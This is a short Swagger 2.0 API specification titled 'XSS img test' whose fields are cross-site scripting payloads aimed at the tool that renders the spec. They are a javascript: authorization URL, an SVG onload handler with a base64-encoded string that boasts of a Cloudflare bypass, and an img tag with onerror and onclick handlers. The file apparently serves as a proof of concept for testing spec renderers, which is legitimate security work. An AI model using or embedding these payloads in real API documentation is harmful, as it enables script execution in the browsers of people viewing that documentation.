swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test
  description:  <Svg Only=1 OnLoad =confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NLZCA6KQ=="))> <img src=https://pbs.twimg.com/profile_images/1489293302541303816/J6VoQDMY_400x400.jpg onclick="alert(2)" onerror="alert(3)">
  


